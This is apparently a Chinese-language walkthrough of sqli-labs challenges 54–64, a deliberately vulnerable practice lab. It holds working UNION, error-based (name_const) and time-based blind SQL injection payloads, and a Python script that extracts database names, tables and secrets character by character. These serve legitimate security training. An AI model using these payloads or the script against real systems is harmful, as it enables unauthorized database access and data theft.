一朵菊花脸上遮
一朵菊花脸上遮

【靶场练习_sqli-labs】SQLi-LABS Page-4 (Challenges)

Less-54:

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

  • Your Password:CL0FY8NWDK

?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database()  and table_name='CL0FY8NWDK'--+

  • Your Login name:challenges
  • Your Password:id,sessid,secret_TOM0,tryy

?id=-1' union select 1,group_concat(sessid),group_concat(secret_TOM0) from CL0FY8NWDK--+

  • Your Login name:d8074a35855a7f4935e3e19222d9a9eb
  • Your Password:bgAkTAN2t9AwqzSZyXtjhag4

【靶场练习_sqli-labs】SQLi-LABS Page-4 (Challenges)_第1张图片

有点迷,不知道这个怎么玩,反正登陆失败了,sessid和secre_TOMO都试过了Orz;

好吧,是没看界面,它的中文意思 :“恭喜你成功了”,【话说你以前不是蓝色的嘛!!!

【靶场练习_sqli-labs】SQLi-LABS Page-4 (Challenges)_第2张图片

 

 

Less-55:

 ?id=1) and (1 ,?id=1) and (0

  • 回显不同,小括号闭合

?id=0) union select 1,group_concat(table_name),database() from information_schema.tables where table_schema=database()--+ :

  • Your Login name:MYGNMGLTYN
  • Your Password:challenges     

?id=0) union select 1,group_concat(column_name),database() from information_schema.columns where table_schema=database() and table_name='MYGNMGLTYN'--+

  • Your Login name:id,sessid,secret_81NP,tryy
  • Your Password:challenges
?id=0) union select 1,group_concat(secret_81NP),database() from MYGNMGLTYN--+
  • Your Login name:56aKKaL0ZO1elWAFGWwRtGcE
  • Your Password:challenges
查出:
  • 56aKKaL0ZO1elWAFGWwRtGcE

Less-56:

?id=1' and '0,?id=1' and '1

  • 回显不同,单引号

?id=2' and '1

  • 查出第一条数据,小括号闭合

?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

  • Your Login name:MYGNMGLTYN
  • Your Password:3

 

?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='MYGNMGLTYN'--+

?id=0') union select 1,group_concat(secret_81NP),3 from MYGNMGLTYN--+

  • Your Login name:56aKKaL0ZO1elWAFGWwRtGcE
  • Your Password:3

查出:

  • 56aKKaL0ZO1elWAFGWwRtGcE

【靶场练习_sqli-labs】SQLi-LABS Page-4 (Challenges)_第3张图片

 

Less-57:

?id=1" and "0,?id=1" and "1

  • 双引号闭合

?id=2" and "1

  • 回显第二条,没有小括号

?id=0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

  • Your Login name:2
  • Your Password:KXPI7R3J3M

?id=0" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database()--+

  • Your Login name:2
  • Your Password:id,sessid,secret_24A7,tryy


?id=0" union select 1,2,group_concat(secret_24A7) from KXPI7R3J3M--+

  • Your Login name:2
  • Your Password:TNxWAHFGN4l1FiZOpr3F6yju

查出:

  • TNxWAHFGN4l1FiZOpr3F6yju

 

Less-58:

?id=1' and '1 ,?id=1' and '0

  • 单引号闭合

?id=2') and ('1

  • 报错,无小括号

?id=' union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)--+

  • Duplicate column name 'ZQ803A690O'

?id=' union (SELECT * FROM (SELECT name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1),name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1)) a)--+

  • Duplicate column name 'id,sessid,secret_TB31,tryy'

?id=' union (SELECT * FROM (SELECT name_const((select group_concat(secret_TB31) from ZQ803A690O),1),name_const((select group_concat(secret_TB31) from ZQ803A690O),1)) a)--+

  • Duplicate column name '9f7VYPJeYRbMCqZ7mGZkzOlu'

提交:

  • 9f7VYPJeYRbMCqZ7mGZkzOlu

Less-59:

?id=1 and 1,?id=1 and 0

  • 数字型

?id=2 and 1

  • 回显第二条,无小括号

?id=0 union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)--+

  • Duplicate column name 'DDCETXN5RL'

?id=0 union (SELECT * FROM (SELECT name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1),name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1)) a)--+

  • Duplicate column name 'id,sessid,secret_NW54,tryy'

?id=0 union (SELECT * FROM (SELECT name_const((select group_concat(secret_NW54) from DDCETXN5RL),1),name_const((select group_concat(secret_NW54) from DDCETXN5RL),1)) a)--+

  • Duplicate column name '1yChO5jTqiN4t1HpROwWWTBt'

提交:

  • 1yChO5jTqiN4t1HpROwWWTBt

 

Less-60:

?id=2" and "0--+ ,?id=2" and "1--+

  • 双引号闭合,查出第一条无小括号

?id=-1")union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)--+

  • Duplicate column name 'HKTX3I9V9F'

?id=-1")union (SELECT * FROM (SELECT name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1),name_const((select group_concat(column_name) from information_schema.columns where table_schema=database()),1)) a)--+

  • Duplicate column name 'id,sessid,secret_39ZN,tryy'

?id=-1")union (SELECT * FROM (SELECT name_const((select group_concat(secret_39ZN) from HKTX3I9V9F),1),name_const((select group_concat(secret_39ZN) from HKTX3I9V9F),1)) a)--+

  • Duplicate column name 'JGw1EIsBhUycAxCTGOmn3b23'提交:

提交:

  • JGw1EIsBhUycAxCTGOmn3b23

Less-61:有两个小括号Orz

?id=1' and '0,?id=1' and '1

  • 单引号闭合

?id=2' and '1

  • 小括号闭合

?id=-1'))union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)--+

  • Duplicate column name 'P1EYFNKQS3'

【靶场练习_sqli-labs】SQLi-LABS Page-4 (Challenges)_第4张图片 

 Less-62:

?id=1' and '0,?id=1' and '1

  • 单引号闭合

?id=2' and '1

  • 小括号闭合

?id=2' and sleep(3) and '1--+

  • 检测出来用时间盲注

 

'''
@Modify Time      @Author   
------------      -------    
2019/10/10 13:03   laoalo
'''
# -*- coding:utf-8 -*-
import requests
import time

url = "http://192.168.199.190/sqli-labs-master/Less-62/?id=1') "
def database_length():
    global url
    for i in range(1,10000):
        sql = url + " and if((length(database()))>"+str(i)+",0,sleep(3)) +--+"
        s_time = time.time()
        requests.get(url=sql)
        e_time = time.time()
        print(sql)
        if(e_time-s_time) > 3:
            print("数据库长:",i)
            break
def database_name(database_length):
    global url
    sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(3)) +--+"
    db_name = ''
    for num in range(1, database_length+1):
        for asc in range(ord('a'), ord('z') + 1):
            s_time = time.time()
            requests.get(sql.format(num=num, asc=asc))
            e_time = time.time()
            if (e_time - s_time) > 3:
                db_name += chr(asc)
                print("数据库名:",db_name)
                break
def table_length(database_name):
    global url
    for i in range(1, 10000):
        sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(3)) +--+"
        s_time = time.time()
        response = requests.get(url=sql)
        e_time = time.time()
        print(sql)
        if (e_time - s_time) > 3:
            print(database_name,"中的所有数据表名长:", i)
            break
def table_name(table_length,database_name):
    global url
    sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(3)) +--+"
    table_name = ''
    for num in range(1, table_length + 1):
        for asc in range(32, 128):
            s_time = time.time()
            requests.get(sql.format(num=num, asc=asc))
            e_time = time.time()
            if (e_time - s_time) > 3:
                table_name += chr(asc)
                print("所有的数据表名:", table_name)
                break
def column_length(table_name,database_name):
    global url
    for i in range(1, 10000):
        sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"')))>" + str(i) + ",0,sleep(3)) +--+"
        s_time = time.time()
        requests.get(url=sql)
        e_time = time.time()
        # print(sql)
        if (e_time - s_time) > 3:
            print(table_name, "中的所有字段名长:", i)
            break
def column_name(column_length,table_name,database_name):
    global url
    sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='"+database_name+"'),{num},1))>{asc},0,sleep(3)) +--+"
    table_name = ''
    for num in range(1, column_length + 1):
        for asc in range(32, 128):
            s_time = time.time()
            requests.get(sql.format(num=num, asc=asc))
            e_time = time.time()
            if (e_time - s_time) > 3:
                table_name += chr(asc)
                print("所有的字段名:", table_name)
                break
def data_length(column_name,table_name):
    global url
    for i in range(1, 10000):
        sql = url + " and if((select length((select group_concat("+column_name+" separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(3)) +--+"
        s_time = time.time()
        requests.get(url=sql)
        e_time = time.time()
        # print(sql)
        if (e_time - s_time) > 3:
            print(column_name, "字段的值长:", i)
            break
def data_detail(data_length,column_name,table_name):
    global url
    sql = url + " and if(ascii(substr((select group_concat("+column_name+" separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(3)) +--+"
    data = ''
    for num in range(1, data_length + 1):
        for asc in range(32, 128):
            s_time = time.time()
            requests.get(sql.format(num=num, asc=asc))
            e_time = time.time()
            if (e_time - s_time) > 3:
                data += chr(asc)
                print(column_name,"字段的值:", data)
                break
if __name__ == '__main__':
    # database_length() #数据库长: 10
    # database_name(10) #数据库名: challenges
    # table_length('challenges')#challenges 中的所有数据表名长: 10
    # table_name(10, 'challenges')#所有的数据表名: P1EYFNKQS3
    # column_length('P1EYFNKQS3','challenges') #P1EYFNKQS3 中的所有字段名长: 26
    # column_name(26,'P1EYFNKQS3','challenges')#所有的字段名: id@sessid@secret_ZGLB@tryy
    # data_length('secret_ZGLB', 'P1EYFNKQS3')#secret_ZGLB 字段的值长: 24
    data_detail(24, 'secret_ZGLB', 'P1EYFNKQS3')#secret_ZGLB 字段的值: o6x95TdsyX3fTTBuJcgRIpoa
View Code

【靶场练习_sqli-labs】SQLi-LABS Page-4 (Challenges)_第5张图片

 

  Less-63:

?id=1' and '0,?id=1' and '1

  • 单引号闭合

?id=1' and sleep(1) --+

  • 检测出来用时间盲注

脚本用62的把这里改了就行

1 url = "http://192.168.199.190/sqli-labs-master/Less-63/?id=1' "

【靶场练习_sqli-labs】SQLi-LABS Page-4 (Challenges)_第6张图片

  

 Less-64:

?id=1 and 0,?id=1 and 0

  • 数字型

?id=2 and 1

  • 返回第一条,小括号

 select * from users where id=(1 and if((length(database())=8),sleep(1),1));

  •  时间盲注脚本用62的

【靶场练习_sqli-labs】SQLi-LABS Page-4 (Challenges)_第7张图片

 

 

Less-65:

Less-66:

Less-67:

Less-68:

 

Less-69:

Less-70:

 

Less-71:

Less-72:

 

Less-73:

Less-74:

 

 

 

 

 

 

 

你可能感兴趣的:(【靶场练习_sqli-labs】SQLi-LABS Page-4 (Challenges))

  • Sqli-labs靶场第11关详解[Sqli-labs-less-11] 「已注销」 sqli-labs数据库web安全网络安全mysqlsql
    Sqli-labs-Less-11前言:SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用orderby来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version(
  • sqli-labs less17 password-update语句 Yix1a
    转自一位不知名大佬的笔记-----------------------------------less-17-----------------------------------原urlhttp://192.168.137.138/sqli-labs-master/Less-17/页面显示:[PASSWORDRESET](密码重置)说明这个页面很有可能是使用了update语句很多网页有修改密码的功
  • BUUCTF [SWPU2019]神奇的二维码 1 玥轩_521 BUUCTFMISC安全CTF笔记网络安全BUUCTFMisc
    BUUCTF:https://buuoj.cn/challenges题目描述:得到的flag请包上flag{}提交。密文:下载附件,得到一个.png图片。解题思路:1、使用QRresearch扫一下,得到“swpuctf{flag_is_not_here}”的提示。2、放到010Editor中看一下,没找到什么明显的特征。使用Kali中的binwalk工具进行检测,发现四个rar压缩包。使用bin
  • Sqli-labs——lesson11 Shock397 Sqli-labs闯关安全
    在11关是登录界面了我们可以先用bp抓包来看它的post请求来再在Hackbar里面的postdata里面对数据进行操作1、在对uname的admin加上'后回显错误,说明此处存在注入漏洞2、首先先在username中验证:用or1=1#即可验证此处确实存在注入漏洞同样在password位也能验证出来3、验证成功后我们开始构造sql语句进行注入1)判断列数:输入orderby3回显错误,2正确,说
  • BugKu-Web-矛盾 H_u_p 网络安全
    BugKu-Web-矛盾题目链接:https://ctf.bugku.com/challenges/detail/id/72.html考点:PHP弱类型比较漏洞题目源码分析:$num=$_GET['num'];//定义一个num变量用get方法接收if(!is_numeric($num))//判断如果$num不全为数字或数字字符串,满足就执行下面的代码{echo$num;if($num==1)//
  • sqli-labs靶场安装 小红帽Like大灰狼 Kali网络安全sql靶场sql注入小皮搭建sqli-labs靶场
    1、下载小皮官网下载:https://www.xp.cn/2、安装小皮不要安装在有中文的目录下3、打开靶场,解压靶场靶场地址(我网盘分享了)sqli-labs靶场提取码:jctl**4、配置网站**5、浏览器访问网站安装成功
  • 《SQLi-Labs》05. Less 29~37 永别了,赛艾斯滴恩 lessandroid前端
    title:《SQLi-Labs》05.Less29~37date:2024-01-1722:49:10updated:2024-02-1218:09:10categories:WriteUp:Security-Labexcerpt:HTTP参数污染,联合注入、宽字节注入。comments:falsetags:top_image:/images/backimg/SunsetClimbing.png
  • Deep Learning Workload Scheduling in GPU Datacenters:Taxonomy, Challenges and Vision 论文阅读 牛码当驴 云计算算法云计算论文阅读
    【论文阅读笔记】DeepLearningWorkloadSchedulinginGPUDatacenters:Taxonomy,ChallengesandVision论文链接GPU数据中心的DL工作负载调度:分类、挑战、展望AbstractDeeplearning(DL)showsitsprosperityinawidevarietyoffields.ThedevelopmentofaDLmode
  • Vulnhub--hacksudo(thor)靶场 lexia7 每周靶场训练网络安全web安全
    hacksudo-thor靶场练习---中0x00部署0x01信息收集1.主机发现2.端口扫描3.路径爬取开源源码泄漏默认帐号密码业务逻辑漏洞破壳漏洞GTFOBins提权0x02总结0x00部署hacksudo-thor靶机:下载地址宿主机:kali2022目标:获取root拿到flag文件0x01信息收集1.主机发现$sudoarp-scan-l//因为靶机与宿主机在同一网段,所以用二级扫描来发
  • 云服务器利用Docker搭建sqli-labs靶场环境
    在云服务器上利用Docker搭建sqli-labs靶场环境可以通过以下步骤完成:安装Docker:首先,你需要在你的云服务器上安装Docker。具体命令如下:sudoapt-getupdatesudoapt-getinstalldocker-ce拉取sqli-labs镜像:接下来,你需要从DockerHub上拉取sqli-labs的镜像。可以使用以下命令完成:dockerpullaudi1/sql
  • 《マジック・ランチャー 庵野秀明 X 岩井俊二》Round5:Challenges 加刘景长
    搬运翻译微博@冰-koori兴趣使然的翻译,水平有限,如有错误欢迎指出。感谢@塔塔君minkun和@ranlz7,感谢ample。赢不了真实的事物庵野:最近我去给AV摄影帮忙了。我亲自去操作现场的摄影机。正戏的镜头里,我总是对那个女孩子的脚的位置不满意。比起那段戏的真实感,我反而在意起了画面的构成,脚的角度不行啊之类的。还是在创作啊(笑)。虽然我自己心里知道那只脚应该摆哪里,但是素人的女孩子是不会
  • Sqli-Labs 通关笔记 神丶上单 数据库mysqlsql网络安全web
    文章目录07-SQL注入1.搭建sqli靶场2.完成SQLi-LABSPage-1**Less-1GET-Errorbased-Singlequotes-String(基于错误的GET单引号字符型注入)**1.获取当前数据库2.获取所有库名3.获取表名4.获取表的所有字段5.获取users表所有字段内容**Less-2GET-Errorbased-Intigerbased(基于错误的GET整型注入
  • sqli-labs环境安装及所遇到的坑 积极向上的三毛
    我们采用的是Sqli-labs+phpstudy的方式。1.下载phpstudy并解压安装,下载地址:https://www.xp.cn/download.html?utm_source=so注意:本机由于一开始下的版本过高,导致不兼容。以下为2016版。从网上查询得知,因为sqli-labs是很多年前的了,php版本过高会导致无法解析。2.Sqli-labs项目地址—Github获取:https
  • [BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析) 柠.筱 BUUCTF-WEB-WPphpweb安全开发语言sql
    目录题目链接:题目解析:得到flag:题目链接:https://buuoj.cn/challenges#[%E7%AC%AC%E4%B8%80%E7%AB%A0%20web%E5%85%A5%E9%97%A8]SQL%E6%B3%A8%E5%85%A5-2题目解析:注意查看细节,发现题目中有一处请访问,在上图标记的位置我们按提示分别访问/login.php和/user.php去看看进入页面后习惯性
  • 2018-02-02 for...else...解决一个HackerRank问题 Between Two Sets 开子的私家地
    转自https://www.hackerrank.com/challenges/between-two-sets/problem参考http://www.runoob.com/python/python-for-loop.html循环使用else语句在python中,for…else表示这样的意思,for中的语句和普通的没有区别,else中的语句会在循环正常执行完(即for不是通过break跳出而
  • CTF--Web安全--SQL注入之Post-Union注入 给我杯冰美式 Web安全--SQL注入web安全sql安全
    一、手动POST注入实现绕过账号密码检测我们利用sqli-labs/Less-11靶场来进行演示:我们可以看到一个登录页面打开Less-11的根目录,我们打开页面的源代码(PHP实现)。用VS-code打开文件,找到验证登录信息的代码行。此形式的代码存在POST注入漏洞。我们可以注入一句万能密码。admin'or1=1#单看这句代码可能不是很直观,我们将这句万能密码写到源代码中进行观察。@$sql
  • CTF-Web安全--SQL注入之Union注入详解 给我杯冰美式 Web安全--SQL注入web安全sql安全
    一、测试靶场与使用工具浏览器:火狐浏览器--Firefox靶场:sqli-labs使用插件:HackBar操作环境:phpstudy二、判断字符型注入与数字型注入操作步骤:1、用F12打开控制台,打开HackBar,LoarURL,将当前靶场的URL信息复制到操作台上2、输入?id=1,观察到页面发生变化,显示的是id=1时数据库中的信息,?是用来分割URL和查询字符串的,查询到了id=1时的用户
  • Sqli-labs靶场1-5 777sea 网络安全技术学习sqlweb安全
    流程判断注入点和注入类型判断字段个数判断显示位爆库爆表爆字段名爆内容配置注意事项使用sqli-labs本地靶场,配置本地靶场需要注意的问题:数据库配置文件db-creds.incphp版本由于该靶场比较古早,所以php的版本要选择更低一点的,比如5.3.29Less-1单引号注入1.判断注入点和注入类型单引号报错?id=-1'--+2.查字段个数?id=1'orderby4--+3.判断显示位?i
  • CenOS6.5搭建sqli-labs-master靶场环境 Toert_T sql注入安全信息安全sql网络安全mysqlphp
    目录一、靶场搭建环境准备二、搭建过程0x1配置本地软件仓库0x2安装sqli-labs支持服务0x3部署sqli-labs靶场三、测试sqli-labs靶场环境一、靶场搭建环境准备sqli-labs-master是一套结合http+php+mysql环境的sql注入练习平台,里面有丰富的sql注入靶场环境虚拟机软件:VMware®Workstation16Pro虚拟机系统:Centos6.5虚拟网
  • sqli-labs-master靶场搭建详细过程(附下载链接) Sarahie 靶场网络安全
    1、下载地址:小皮:Windows版phpstudy下载-小皮面板(phpstudy)(xp.cn)Sqli:mirrors/audi-1/sqli-labs·GitCode2、安装小皮3、把sqli压缩包放进去解压,找到$dbpass=''单引号里面填root具体路径如下4、打开小皮,启动apache、mysql,访问:http://127.0.0.1/sqli-labs-master/搭建完成
  • SQL注入:sqli-labs靶场通关(1-37关) 未知百分百 安全数据库sql数据库通关网络安全安全web安全安全威胁分析
    SQL注入系列文章:初识SQL注入-CSDN博客SQL注入:联合查询的三个绕过技巧-CSDN博客SQL注入:报错注入-CSDN博客SQL注入:盲注-CSDN博客SQL注入:二次注入-CSDN博客SQL注入:orderby注入-CSDN博客SQL注入:宽字节注入-CSDN博客目录第1关(联合查询)第2关(数字型)第3关('闭合)第4关(")闭合)第5关(报错注入)第6关("闭合)第7关(secure
  • Learn the basics of Python 3-Code Challenges:Loops(Advanced) 皮猴的路数 Python教程python开发语言
    1.Codingquestion1:LargerSumCreateafunctionnamedlarger_sum()thattakestwolistsofnumbersasparametersnamedlst1andlst2.Thefunctionshouldreturnthelistwhoseelementssumtothegreaternumber.Ifthesumoftheelements
  • sqli.labs靶场(54-65关) 沧海一粟@星火燎原 数据库mysqlsql
    54、第五十四关提示尝试是十次后数据库就重置,那我们尝试union原来是单引号闭合id=-1'unionselect1,database(),(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schema=database())--+数据库:challenges,表名是:4c7k78qe8t,就一个表id=
  • MAC下搭建PHP开发环境及sqli-labs安装 2mpossible
    为了学习web,首先要搭建php开发环境,由于我用的是mac,所以首选用MAMP来搭建首先确保互联网共享状态是关闭的,在系统偏好设置的共享里面设置然后安装MAMP安装好了会有MAMP和MAMPPRO,打开MAMP,StartServers在localhost:8888就会有我们的服务点击Preferences,在Ports修改Apache和Mysql端口为80和3306然后我为了方便更改我的默认目
  • 安全基础~通用漏洞4 `流年づ 安全学习安全
    文章目录知识补充XSS跨站脚本**原理****攻击类型**XSS-后台植入Cookie&表单劫持XSS-Flash钓鱼配合MSF捆绑上线ctfshowXSS靶场练习知识补充SQL注入小迪讲解文件上传小迪讲解文件上传中间件解析XSS跨站脚本xss平台:https://xss.pt/原理恶意攻击者往Web页面里插入恶意可执行网页脚本代码,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而可
  • Hack The Box-Challenges-Misc-M0rsarchive 0415i hacktheboxmiscctf
    解压压缩包,里面是一张图片和一个新的zip文件图片放大后的图案是----.考虑到为莫斯密码,将其解密密码为9,继续解压缩包又是一张莫斯密码图加压缩包,写一段脚本去解密图片中的莫斯密码,并自动解压缩包importreimportosimportsysimportzipfilefromPILimportImagedefget_pass(morse_list):password=""MORSE_CODE
  • CSC8021_computer network_The Network Layer HUT_Tyne265 计算机网络
    StoreandforwardpacketswitchingNetworkLayer–challenges•Internetworking:connectheterogeneoussubnets–Enablelongdistancepoint-to-pointcommunication[Wideareanetwork(WAN)]–ShieldTransportLayerfromtype,sizea
  • 安全基础~通用漏洞3 `流年づ 安全学习安全
    文章目录知识补充文件上传(1)ctfshow文件上传靶场练习150-161文件上传(2)ctfshow文件上传靶场练习162-170文件上传总结文件包含知识补充url编码:0a换行;20空格;3c左尖括号;3e右尖括号;23#;2b+;.htaccess文件是用于apache服务器下的控制文件访问的配置文件,因此Nginx下是不会生效的.htaccess可以控制错误重定向,初始页面设置,文件夹的访
  • 【buuctf Reverse】[GXYCTF2019]luck_guy wp 江山点墨 ctfctfbuuctfReverse
    [GXYCTF2019]luck_guyhttps://buuoj.cn/challenges#[GXYCTF2019]luck_guy只有一个可执行文件,IDA64位直接干进main函数,F5反编译,看主要处理函数,跳转进去在这里看到。flag是由f1和f2拼出来的,f1在汇编中有,双击查看.data:0000000000601078f1db'GXY{do_not_',0;DATAXREF:ge
  • 【论文解读】Collaborative Perception in Autonomous Driving: Methods, Datasets and Challenges(协同感知综述) 我叫两万块 自动驾驶目标检测
    第一次见到这么清晰的综述!摘要引言融合方案协同感知方法(forIdealScenarios)早期融合自定义沟通机制特征融合传统融合:基于图的融合基于注意力的融合自定义损失函数输出融合协同感知方法(forReal-worldIssues)定位错误通信问题模型或任务差异隐私与安全数据集与实验评估挑战与机遇协作感知中的传输效率复杂场景中的协同感知基于联合学习的协同感知低标签依赖的协同感知结论摘要协同感知
  • 枚举的构造函数中抛出异常会怎样 bylijinnan javaenum单例
    首先从使用enum实现单例说起。 为什么要用enum来实现单例? 这篇文章( http://javarevisited.blogspot.sg/2012/07/why-enum-singleton-are-better-in-java.html)阐述了三个理由: 1.enum单例简单、容易,只需几行代码: public enum Singleton { INSTANCE;
  • CMake 教程 aigo C++
    转自:http://xiang.lf.blog.163.com/blog/static/127733322201481114456136/   CMake是一个跨平台的程序构建工具,比如起自己编写Makefile方便很多。 介绍:http://baike.baidu.com/view/1126160.htm 本文件不介绍CMake的基本语法,下面是篇不错的入门教程: http:
  • cvc-complex-type.2.3: Element 'beans' cannot have character Cb123456 springWebgis
      cvc-complex-type.2.3: Element 'beans' cannot have character     Line 33 in XML document from ServletContext resource [/WEB-INF/backend-servlet.xml] is i
  • jquery实例:随页面滚动条滚动而自动加载内容 120153216 jquery
    <script language="javascript"> $(function (){ var i = 4;$(window).bind("scroll", function (event){ //滚动条到网页头部的 高度,兼容ie,ff,chrome var top = document.documentElement.s
  • 将数据库中的数据转换成dbs文件 何必如此 sqldbs
    旗正规则引擎通过数据库配置器(DataBuilder)来管理数据库,无论是Oracle,还是其他主流的数据都支持,操作方式是一样的。旗正规则引擎的数据库配置器是用于编辑数据库结构信息以及管理数据库表数据,并且可以执行SQL 语句,主要功能如下。 1)数据库生成表结构信息:         主要生成数据库配置文件(.conf文
  • 在IBATIS中配置SQL语句的IN方式 357029540 ibatis
    在使用IBATIS进行SQL语句配置查询时,我们一定会遇到通过IN查询的地方,在使用IN查询时我们可以有两种方式进行配置参数:String和List。具体使用方式如下: 1.String:定义一个String的参数userIds,把这个参数传入IBATIS的sql配置文件,sql语句就可以这样写: <select id="getForms" param
  • Spring3 MVC 笔记(一) 7454103 springmvcbeanRESTJSF
             自从 MVC 这个概念提出来之后 struts1.X  struts2.X   jsf 。。。。。 这个view 层的技术一个接一个! 都用过!不敢说哪个绝对的强悍! 要看业务,和整体的设计!      最近公司要求开发个新系统!
  • Timer与Spring Quartz 定时执行程序 darkranger springbean工作quartz
    有时候需要定时触发某一项任务。其实在jdk1.3,java sdk就通过java.util.Timer提供相应的功能。一个简单的例子说明如何使用,很简单: 1、第一步,我们需要建立一项任务,我们的任务需要继承java.util.TimerTask package com.test; import java.text.SimpleDateFormat; import java.util.Date;
  • 大端小端转换,le32_to_cpu 和cpu_to_le32 aijuans C语言相关
    大端小端转换,le32_to_cpu 和cpu_to_le32  字节序 http://oss.org.cn/kernel-book/ldd3/ch11s04.html         小心不要假设字节序. PC 存储多字节值是低字节为先(小端为先, 因此是小端), 一些高级的平台以另一种方式(大端)
  • Nginx负载均衡配置实例详解 avords
    [导读] 负载均衡是我们大流量网站要做的一个东西,下面我来给大家介绍在Nginx服务器上进行负载均衡配置方法,希望对有需要的同学有所帮助哦。负载均衡先来简单了解一下什么是负载均衡,单从字面上的意思来理解就可以解 负载均衡是我们大流量网站要做的一个东西,下面我来给大家介绍在Nginx服务器上进行负载均衡配置方法,希望对有需要的同学有所帮助哦。 负载均衡 先来简单了解一下什么是负载均衡
  • 乱说的 houxinyou 框架敏捷开发软件测试
    从很久以前,大家就研究框架,开发方法,软件工程,好多!反正我是搞不明白! 这两天看好多人研究敏捷模型,瀑布模型!也没太搞明白. 不过感觉和程序开发语言差不多, 瀑布就是顺序,敏捷就是循环. 瀑布就是需求、分析、设计、编码、测试一步一步走下来。而敏捷就是按摸块或者说迭代做个循环,第个循环中也一样是需求、分析、设计、编码、测试一步一步走下来。 也可以把软件开发理
  • 欣赏的价值——一个小故事 bijian1013 有效辅导欣赏欣赏的价值
      第一次参加家长会,幼儿园的老师说:"您的儿子有多动症,在板凳上连三分钟都坐不了,你最好带他去医院看一看。"  回家的路上,儿子问她老师都说了些什么,她鼻子一酸,差点流下泪来。因为全班30位小朋友,惟有他表现最差;惟有对他,老师表现出不屑,然而她还在告诉她的儿子:"老师表扬你了,说宝宝原来在板凳上坐不了一分钟,现在能坐三分钟。其他妈妈都非常羡慕妈妈,因为全班只有宝宝
  • 包冲突问题的解决方法 bingyingao eclipsemavenexclusions包冲突
    包冲突是开发过程中很常见的问题: 其表现有: 1.明明在eclipse中能够索引到某个类,运行时却报出找不到类。 2.明明在eclipse中能够索引到某个类的方法,运行时却报出找不到方法。 3.类及方法都有,以正确编译成了.class文件,在本机跑的好好的,发到测试或者正式环境就 抛如下异常: java.lang.NoClassDefFoundError: Could not in
  • 【Spark七十五】Spark Streaming整合Flume-NG三之接入log4j bit1129 Stream
    先来一段废话: 实际工作中,业务系统的日志基本上是使用Log4j写入到日志文件中的,问题的关键之处在于业务日志的格式混乱,这给对日志文件中的日志进行统计分析带来了极大的困难,或者说,基本上无法进行分析,每个人写日志的习惯不同,导致日志行的格式五花八门,最后只能通过grep来查找特定的关键词缩小范围,但是在集群环境下,每个机器去grep一遍,分析一遍,这个效率如何可想之二,大好光阴都浪费在这上面了
  • sudoku solver in Haskell bookjovi sudokuhaskell
    这几天没太多的事做,想着用函数式语言来写点实用的程序,像fib和prime之类的就不想提了(就一行代码的事),写什么程序呢?在网上闲逛时发现sudoku游戏,sudoku十几年前就知道了,学生生涯时也想过用C/Java来实现个智能求解,但到最后往往没写成,主要是用C/Java写的话会很麻烦。   现在写程序,本人总是有一种思维惯性,总是想把程序写的更紧凑,更精致,代码行数最少,所以现
  • java apache ftpClient bro_feng java
    最近使用apache的ftpclient插件实现ftp下载,遇见几个问题,做如下总结。 1. 上传阻塞,一连串的上传,其中一个就阻塞了,或是用storeFile上传时返回false。查了点资料,说是FTP有主动模式和被动模式。将传出模式修改为被动模式ftp.enterLocalPassiveMode();然后就好了。 看了网上相关介绍,对主动模式和被动模式区别还是比较的模糊,不太了解被动模
  • 读《研磨设计模式》-代码笔记-工厂方法模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ package design.pattern; /* * 工厂方法模式:使一个类的实例化延迟到子类 * 某次,我在工作不知不觉中就用到了工厂方法模式(称为模板方法模式更恰当。2012-10-29): * 有很多不同的产品,它
  • 面试记录语 chenyu19891124 招聘
    或许真的在一个平台上成长成什么样,都必须靠自己去努力。有了好的平台让自己展示,就该好好努力。今天是自己单独一次去面试别人,感觉有点小紧张,说话有点打结。在面试完后写面试情况表,下笔真的好难,尤其是要对面试人的情况说明真的好难。 今天面试的是自己同事的同事,现在的这个同事要离职了,介绍了我现在这位同事以前的同事来面试。今天这位求职者面试的是配置管理,期初看了简历觉得应该很适合做配置管理,但是今天面
  • Fire Workflow 1.0正式版终于发布了 comsci 工作workflowGoogle
